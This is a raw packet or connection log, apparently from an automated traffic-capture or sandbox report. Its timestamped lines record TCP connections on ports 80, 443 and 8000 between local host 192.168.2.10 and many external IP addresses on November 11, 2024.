                                                                                                                                                                                                            Nov 11, 2024 18:24:30.253149033 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.253206015 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.261563063 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.261605024 CET44349740188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.261718988 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.267308950 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.267358065 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.267446041 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.267457008 CET44349740188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.434083939 CET4974180192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.439032078 CET8049741154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.439102888 CET4974180192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.443002939 CET4974180192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.448156118 CET8049741154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.454983950 CET804973544.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.455126047 CET4973580192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.457834959 CET4973580192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.462362051 CET804973544.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.462424994 CET4973580192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.463263035 CET804973544.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.468175888 CET8049734208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.468239069 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.469310999 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.474651098 CET8049734208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.492614031 CET804973644.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.492705107 CET4973680192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.496556044 CET4973680192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.499897957 CET804973644.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.499944925 CET4973680192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.501791954 CET804973644.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.572403908 CET8049734208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.572464943 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.642108917 CET4974780192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.648061037 CET8049747178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.648154020 CET4974780192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.648385048 CET4974780192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884193897 CET804973823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884222031 CET804973823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884282112 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884351015 CET804973823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884417057 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884779930 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884831905 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.886159897 CET8049747178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.894217014 CET44349740188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.894253016 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.894285917 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.894334078 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038160086 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038178921 CET44349740188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038302898 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038330078 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038590908 CET44349740188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038667917 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038710117 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.038902044 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.041305065 CET49740443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.041306019 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.083338022 CET44349740188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.087332964 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271152973 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271271944 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271423101 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271466017 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271493912 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271507025 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271537066 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.271548986 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.272303104 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.272356033 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.353163004 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.353243113 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.353339911 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.353394032 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354679108 CET8049741154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354779959 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354794025 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354834080 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354844093 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354861975 CET4434973999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354862928 CET4974180192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354878902 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354898930 CET49739443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:32.976778984 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:32.977221966 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.019335032 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756201029 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756251097 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756266117 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756275892 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756310940 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756315947 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756324053 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756355047 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756369114 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756402969 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756649017 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756678104 CET44349761188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:33.756716967 CET49761443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:39.929481030 CET8049724199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:39.930696011 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.551897049 CET4974780192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.578546047 CET4997480192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.583606958 CET8049974178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.583746910 CET4997480192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.584044933 CET4997480192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.589013100 CET8049974178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.006016970 CET8049974178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.006114960 CET4997480192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.006236076 CET4997480192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.011086941 CET8049974178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.032195091 CET4999480192.168.2.1013.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037329912 CET804999413.248.169.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037406921 CET4999480192.168.2.1013.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037652016 CET4999480192.168.2.1013.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.042640924 CET804999413.248.169.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.214114904 CET6405280192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.219397068 CET8064052188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.219463110 CET6405280192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.223046064 CET6405280192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.227910042 CET8064052188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.318732023 CET6405380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.323616028 CET806405318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.323690891 CET6405380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.323898077 CET6405380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.328882933 CET806405318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.346976995 CET6405480192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.351819038 CET80640543.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.351888895 CET6405480192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.352009058 CET6405480192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.356936932 CET80640543.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.468385935 CET804999413.248.169.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.468485117 CET4999480192.168.2.1013.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.751981974 CET806405318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.752110004 CET6405380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.758919954 CET806405318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.758977890 CET6405380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.760854959 CET6405380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.765980959 CET806405318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.778263092 CET80640543.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.778434038 CET6405480192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.780658007 CET6405480192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.785954952 CET80640543.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.786003113 CET6405480192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.800527096 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.805540085 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.805624962 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.805753946 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.811697960 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.891809940 CET8064052188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.891885042 CET6405280192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.892375946 CET8064052188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.892422915 CET6405280192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.900125027 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.900160074 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.900216103 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.900485992 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.900497913 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.338840008 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.338908911 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.353818893 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.353837013 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.354087114 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.354135990 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.354573011 CET64056443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.395333052 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.599545956 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.599596977 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.603497028 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.608584881 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.608647108 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.608824015 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.614754915 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.401871920 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.401947021 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.403079033 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.407936096 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.707199097 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.707262993 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.708832979 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.713753939 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.975815058 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.976694107 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:25:14.399693966 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:14.399743080 CET44364056188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981616974 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981617928 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981617928 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981630087 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981631041 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981642962 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981657028 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981673956 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981686115 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981724977 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981724977 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.986552954 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.986646891 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.986675024 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.986763000 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.986763000 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070278883 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070337057 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070338964 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070349932 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070363045 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070389032 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070416927 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070517063 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070532084 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070544004 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070563078 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070568085 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070568085 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070580959 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070593119 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070600033 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070653915 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.070653915 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.862020969 CET6237380192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.866873026 CET806237364.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.866946936 CET6237380192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.867218018 CET6237380192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.872400045 CET806237364.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.155651093 CET6130080192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.161215067 CET806130072.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.161360025 CET6130080192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.162610054 CET6130080192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.167946100 CET806130072.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.416307926 CET806237364.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.420375109 CET6237380192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.658932924 CET806130072.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.659044027 CET6130080192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.659281969 CET6130080192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.664793968 CET806130072.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.676821947 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.681700945 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.681905985 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.681967974 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.686871052 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.090801001 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.090868950 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.091046095 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.091198921 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.091272116 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.092778921 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.092824936 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.093147039 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.093213081 CET6130180192.168.2.1072.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.096674919 CET806130172.52.179.174192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.070871115 CET806406764.190.63.136192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.071074963 CET6406780192.168.2.1064.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.801399946 CET5797480192.168.2.1052.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.806200981 CET805797452.34.198.229192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.806386948 CET5797480192.168.2.1052.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.806463003 CET5797480192.168.2.1052.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.811435938 CET805797452.34.198.229192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.491776943 CET805797452.34.198.229192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.491906881 CET5797480192.168.2.1052.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.501657963 CET5797480192.168.2.1052.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.507333040 CET805797452.34.198.229192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.507392883 CET5797480192.168.2.1052.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.967878103 CET5748180192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.972733021 CET805748144.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.973598003 CET5748180192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.973712921 CET5748180192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.978688002 CET805748144.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.402127981 CET805748144.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.402460098 CET5748180192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.403810978 CET5748180192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.409375906 CET805748144.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.409816027 CET5748180192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.742497921 CET8064066199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.742835999 CET6406680192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.540994883 CET6204180192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.542047977 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.542543888 CET6204280192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.545957088 CET8062041178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.546045065 CET6204180192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.547384024 CET8049724199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.547396898 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.547468901 CET6204280192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.548319101 CET6204280192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.549794912 CET6204380192.168.2.1023.253.46.64
